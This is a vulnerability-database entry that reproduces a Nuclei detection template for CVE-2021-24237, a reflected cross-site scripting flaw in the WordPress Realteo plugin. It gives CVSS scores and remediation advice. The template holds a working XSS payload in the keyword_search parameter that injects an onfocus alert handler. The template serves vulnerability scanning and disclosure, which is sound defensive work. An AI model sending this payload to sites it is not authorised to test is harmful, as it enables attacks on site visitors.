Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2021-24237
HistoryJun 09, 2021 - 11:11 a.m.

WordPress Realteo <=1.2.3 - Cross-Site Scripting

2021-06-0911:11:17
ProjectDiscovery
github.com
4

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

4.3 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

0.003 Low

EPSS

Percentile

65.8%

WordPress Realteo plugin 1.2.3 and prior contains an unauthenticated reflected cross-site scripting vulnerability due to improper sanitization of keyword_search, search_radius. _bedrooms and _bathrooms GET parameters before outputting them in its properties page.

id: CVE-2021-24237

info:
  name: WordPress Realteo <=1.2.3 - Cross-Site Scripting
  author: 0x_Akoko
  severity: medium
  description: WordPress Realteo plugin 1.2.3 and prior contains an unauthenticated reflected cross-site scripting vulnerability due to improper sanitization of keyword_search, search_radius. _bedrooms and _bathrooms GET parameters before outputting them in its properties page.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
  remediation: |
    Update to the latest version of the WordPress Realteo plugin (>=1.2.4) which includes a fix for the Cross-Site Scripting vulnerability.
  reference:
    - https://wpscan.com/vulnerability/087b27c4-289e-410f-af74-828a608a4e1e
    - https://m0ze.ru/vulnerability/[2021-03-20]-[WordPress]-[CWE-79]-Realteo-WordPress-Plugin-v1.2.3.txt
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24237
    - https://m0ze.ru/vulnerability/[2021-03-20]-[WordPress]-[CWE-79]-Findeo-WordPress-Theme-v1.3.0.txt
    - https://www.docs.purethemes.net/findeo/knowledge-base/changelog-findeo/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-24237
    cwe-id: CWE-79
    epss-score: 0.00265
    epss-percentile: 0.65501
    cpe: cpe:2.3:a:purethemes:findeo:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: purethemes
    product: findeo
    framework: wordpress
  tags: cve2021,cve,realteo,xss,wordpress,plugin,wpscan,intrusive,purethemes

http:
  - method: GET
    path:
      - "{{BaseURL}}/properties/?keyword_search=--!%3E%22%20autofocus%20onfocus%3Dalert(/{{randstr}}/)%3B%2F%2F"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - autofocus onfocus=alert(/{{randstr}}/);//
          - Nothing found
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a0047304502204b9bcf654a4fdbd7dd7b23c12beaa5286360f594247e37850e45dce56acfa10f02210098b0b6add57f62bf6677700e736e62b4182e01c7236ca9127ab47e2746206de9:922c64590222798bb761d5b6d8e72950

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

4.3 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

0.003 Low

EPSS

Percentile

65.8%

Related for NUCLEI:CVE-2021-24237